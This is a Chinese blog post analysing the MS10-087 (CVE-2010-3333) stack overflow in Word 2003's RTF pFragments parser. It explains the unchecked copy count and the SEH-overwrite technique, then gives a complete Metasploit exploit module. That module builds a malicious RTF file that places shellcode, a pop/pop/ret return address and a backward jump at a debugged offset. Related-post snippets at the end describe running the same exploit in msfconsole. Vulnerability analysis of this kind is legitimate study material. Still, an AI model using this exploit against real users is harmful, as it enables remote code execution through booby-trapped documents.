对ms10-087(CVE-2010-3333)漏洞分析

最新推荐文章于 2024-05-16 16:25:06 发布
最新推荐文章于 2024-05-16 16:25:06 发布
阅读量3.5k 收藏 1
点赞数
文章标签: 漏洞 metasploit rtf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dg_programming/article/details/36871739
版权

感觉通过分析这个漏洞学到了很多,了解文档格式,去构造相应的漏洞文档。。。

这是office的RTF解析漏洞,主要是在解析pfragment属性出现的栈溢出问题,废话少说了,开始分析.....

1.基本介绍

     平台:Windows Xp Sp3 word 2003

     POC构造平台:BT5 Metasploit


2.攻击展示


2.RTF文档分析

RTF文档格式: {\rtf1    ; 指明的rtf文档,即RTF文件头
因为此漏洞是在RTF解析pFragments属性时出现的栈溢出,且该属性属于RTF绘图时的属性,因此将介绍与之相关的文件的格式。
{\shp    ;这个控制字是将图形相关的信息组合到一起。
{\sp    ;绘图属性控制字,说明后面将是绘图属性的描述。
{\sn 属性名}    ;指明是何种属性。
{\sv 属性值}    ;指明的合适的属性值。


3.漏洞分析

RTF漏洞原因: 在进行复制的时候,因为没有对复制次数进行检测,导致复制时栈溢出。

该语句是重复将ESI指向的源数据区重复复制一个双字(这里是32bit)到EDI寄存器指向的目的数据区,重复次数由ECX决定,因为没有对ECX的值进行限制,因此导致复制次数过多,使得栈溢出。


该漏洞发生在解析pfragment属性,下面为RTF解析该属性的部分源代码。

在这里,复制的次数有ECX决定,而ECX理论上的最大值应该为FFFF,但是在进行复制之前,有一个移位运算(shr ecx,2),因此ECX的最大值为3FFF,因此能够达到的最大复制为4*3FFF=FFFC字节,而分配给程序的程序运行栈栈底为0012ffff(一次运行),而执行这次复制的起始地址为00123dc0,因此空间为c240,远小于fffc,因此控制ECX将能够使得复制超过程序运行栈栈底,导致溢出。


4.漏洞利用POC(基于Metasploit)

利用原理:
栈溢出,导致触发SEH机制,使Ret覆盖seh链,使得能够跳转到shellcode

具体过程: 在栈溢出,触发seh机制时,先将一些基本的信息压入栈,然后会将指向下一条seh的地址压入栈(对应为directe),将指向异常处理函数首址的地址压入栈,等。
而在触发异常时,会跳到Ret处进行执行(pop/pop/ret),因此将会执行directe,由directe处指向JMP2,然后由JMP跳到shellcode进行执行。


使用metasploit构造Poc
文档的基本格式构造:
这里给pFragment属性设置了三个值,开始尝试了一个、两个值均利用失败,而使用第三个值利用成功,前面两个值没有作用,因此只需要构造第三个值使之溢出即可。

该属性的第三个值的构造: 该值的前部一些信息(按照格式): 前4个字节的填充,后两个字节指明复制的次数

填充shellcode。

填充directe和Ret,这里使用的是metasploit自带的函数,构造的retu一共8字节,通过OllyBug调试,得出seh的地址相对于shellcode首址偏移51156

构造JMP2,向上跳到shellcode


5.完整的POC

require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking
	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Seh
def initialize(info = {})
		super(update_info(info,
			'Name'           => 'RTF',
			'Description'    => %q{
					exploit
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'think',
			'Version'        => '$v1.0 $',
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'         => 512,
					'BadChars'      => "\x00",
					'DisableNops'   => true 
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'WinxpSp3 office 2003 RTF',
						{
							'Offsets' => [51156],
							'Ret' => 0x30001bdd 	# p/p/r
						}
					],
				],
			'DefaultTarget' => 0))
		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'ms_rtf.rtf']),
			], self.class)
	end

	def exploit
		####################
		data = ''
		data << [0x1000].pack('v') * 2
		data << [0xffff].pack('v')  #copy times
		shellcode = rand_text(60000)
		shellcode[0,payload.encoded.length] = payload.encoded  #payload (shellode)

		#ret and jmp
		retu = generate_seh_record(target.ret) 
		shellcode[51156,51156+retu.length] = retu  		#set the ret
		distance = 51156+retu.length  
		jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
		shellcode[51156+retu.length, jmp_back.length] = jmp_back   #jmp
		
		# RFT file contents
		contents  = "{\\rtf1{\\shp{\\sp{\\sn pFragments}" 	#the base structure
		contents << "{\\sv 1;1;"   				#the first and second value
		contents << data.unpack('H*').first        		#the third value
		contents << shellcode.unpack('H*').first
		contents << "}}}}"
		#contents = jmp_back.length.to_s
		print_status("Creating '#{datastore['FILENAME']}' file ...")
		file_create(contents)  #create file

	end
end

6.参考

Metasploit 渗透测试魔鬼训练营


lsDNG
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【微软漏洞分析MS10-015 Windows 内核异常处理程序漏洞(CVE-2010-0232)
重新启程
10-31 402
微软漏洞分析序列,通过补丁分析找出问题点
cve-2012-0158漏洞分析
小强的博客
11-09 1806
参考《漏洞战争》分析下,记下自己的心得,主要还是汇编代码比较麻烦。 环境是xpsp3+word2003(11.8324.8324): 打开windbg、word软件,windbg附加word软件进程,word打开poc.doc文件,发现windbg已经断下,eip指向0x41414141,说明已经发生了溢出,eip被控制了。 0:009> g (15c.510): Access vi
MS10-087微软OFFICE漏洞【参考拿机模拟】
weixin_30684743的博客
01-02 434
【声明:以下测试仅仅为了学习用途,模仿尝试与博主无关】 工 具:metasploit 目标机:windows xp sp3 步骤: 1、使用msf创建特殊代码的doc文档 命令: msfconsole 进入metasploit控制台 msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof //...
Office软件MS10-087漏洞实战
自学编程_youkewang.top
03-05 2410
0x00:实验漏洞MS10-087,目标机器:WinXPSP3 漏洞影响范围:     0x01:进入MSF终端后查找MS10-087漏洞的攻击模块,设置攻击载荷,如图1-1.   图1-1. 0x02:查看options中需要设置的选项,如图1-2.   图1-2. 0x03:这里先设置FILENAME为:report.doc,然后设置CMD的执行内容,这里设置为弹出一个注
MS10_087漏洞学习研究
weixin_30402343的博客
03-29 427
类别:栈溢出,fileformat类别漏洞 描述:This module exploits a stack-based buffer overflow in the handling of the 'pFragments' shape property within the Microsoft Word RTF parser. 参考资料:《Metasploit魔鬼训练营》p276-p286 ...
基于office渗透(MS10-087 Office(word)渗透攻击)
qq_62803993的博客
01-26 919
如果用户打开或预览特制的RTF电子邮件,则最严重的漏洞可能允许远程执行代码。成功利用这些漏洞中的任何一个的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比,将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。低版本的word版本会出现RTF文件漏洞漏洞:microsoft word中的RTF分析器中的pFragments属性容易受到栈缓存区溢出攻击。
CVE-2012-0158漏洞分析
weixin_44279850的博客
12-27 1453
1样本概况 1.1样本信息 漏洞编号:CVE-2012-0158 漏洞模块:MSCOMCTL.OCX 漏洞类型:缓冲区溢出 样本MD5: 15552F40076D67AF066391D03AC173ED 样本SHA1: 4E8EAD45BDE2CF343DED6B02F13B893D57E1383E 样本CRC32: 51F953DF 1.2漏洞分析环境与工具 操作系统:Window 7 专业版 ...
MS10-070ASP.NETPaddingOracle信息泄露漏洞
03-02
我记得这个漏洞在12年的时候,国内的资料还很少,当时遇到之后来回找资料,但是国内当时在网上能看到的资料只有2篇,但我忘记是哪2篇了,不过手上是有2篇比较早的资料,先传上来做个引题吧。然后,在13年,这个漏洞...
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
03-09
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
MS10-081漏洞分析
wangjiabin2007的专栏
01-11 845
<br /><br />漏洞模块:comctl32.dll<br /> <br />漏洞原因:comctl32:SBGetText函数返回值的验证问题。<br /> <br />详细内容:comctl32:SBGetText函数会被调用两次,第一次用于确认IE浏览器状态栏(status bar)中的字符串长度,第二次是复制状态栏中的字符串到刚刚申请的堆空间中。由于分配堆空间的大小是通过第一次调用comctl32:SBGetText函数来决定的,如果返回值(长度)小于0xfffe(包括空字符),就会处理正常。
永恒之蓝ms10-010漏洞复现
最新发布
qq_48318463的博客
05-16 267
永恒之蓝复现
漏洞战争》学习笔记·2 CVE-2010-3333
黑夜黎明
05-27 700
知识补充   RTF格式是为文本和图像信息格式的交换制定的一种文件格式,使用与不同设备,操作环境和系统。RTF文件基本元素:正文、控制字、控制符号、群组   控制字: RTF用来标记打印控制字符和管理文档信息的一种特殊格式的命令,RTF用它做正文格式的控制代码,每个控制字均以一个 反斜杠\开头 ,由a~z小写字母组成,通常不应该包含任何大写字母,而每个分隔符标志着控制字名称的结束。使用格式:\字母...
CVE-2010-3333:Microsoft RTF 栈溢出漏洞调试分析
CuiXY's Blog
02-08 803
0x01 前言 cve-2010-3333 漏洞是一个栈溢出漏洞,该漏洞是由于 Microsoft文档在处理 RTF 数据的对数据解析处理错误,在进行内存操作时没有对操作的数据进行长度限制,导致存在内存漏洞 环境 windows XP sp3(关闭了 ASLR) 分析工具 windbg 样本 能触发漏洞产生异常的 POC 目的 通过栈回溯的方式找到漏洞溢出点,分析漏洞成因 0x02 通过 me...
CVE-2010-3333 分析学习
bluebloodye的专栏
03-10 850
0x01漏洞描述 0x02分析环境 环境 备注 操作系统 winxpsp3 网上下的镜像 虚拟机 VMware 版本号 15.0.2 调试器 o...
kail利用msf工具对ms10-087漏洞入侵渗透WinXP
qq_50854662的博客
05-27 1969
1.实验环境: Kali2020:10.20.29.129 Windows 2003:10.20.29.137 两台虚拟机能够相互ping通 2.实验步骤 1, 启动Metasploit 2,查找和MS10-087相关的模块search ms10_087 3,使用exploit/windows/fileformat/ms10_087_rtf_pfragments_bof模块 use exploit/windows/fileformat/ms10_087_rtf_pfragments_
CVE-2010-3333 Microsoft RTF栈溢出漏洞分析
weixin_50287973的博客
08-25 930
参考:《漏洞战争》 漏洞描述 Microsoft Office XP SP3,Office 2003 SP3,Office 2007 SP2,Office 2010等多个版本的Office软件中的Open XML文件格式转换器存在栈溢出漏洞,主要是在处理RTF中的“pFragments”属性时存在栈溢出,导致远程攻击者可以借助特制的RTF数据执行任意代码,因此该漏洞又名“RTF栈缓冲区溢出漏洞”。 分析环境 所用环境 操作系统 windows xp sp3 调试器 windbg 漏
漏洞cve2010-3333
m0_64973256的博客
12-22 736
可以看到,ESI地址指向的值已经拷贝到了栈中EBP-10的位置向下。而返回地址在EBP+4的位置,我们已经可以确定淹没返回值的位置了。cve-2010-3333是一个Office 2003 的栈溢出漏洞,其原因是在文档中读取一个属性值的时候,没有对其长度验证,导致了一个溢出,看着很简单的一个漏洞,却又有点恶心人。这里7FFA4512已经被识别成70004512。后面的弹窗shellcode也是一样。标记3处:这里是00000000,用来让je跳转,不要进入循环call;
微软MS10-087漏洞的利用
我还在的博客
09-19 2222
微软MS10-087漏洞的利用0x00 前言0x01 环境1. 目标机环境2. 攻击机环境3. 拓扑结构0x02 利用过程1. 相互ping通2. 启动Metasploit,查找和MS10-087相关的模块3. 加载模块,设置所使用的payload4. 显示需要配置的选项,打开计算器5. 设置攻击目标,exploit6. 运行PAYLOAD 0x00 前言 这是我对微软MS10-087漏洞的利用的...
Apache Flink CVE-2020-17518:远程文件写入漏洞分析
"Apache Flink的CVE-2020-17518是一个严重的安全漏洞,它允许远程攻击者通过REST API进行目录遍历,从而实现任意文件写入。此漏洞影响Apache Flink的1.5.1至1.11.2版本。攻击者可以通过构造特殊的HTTP请求头来将文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值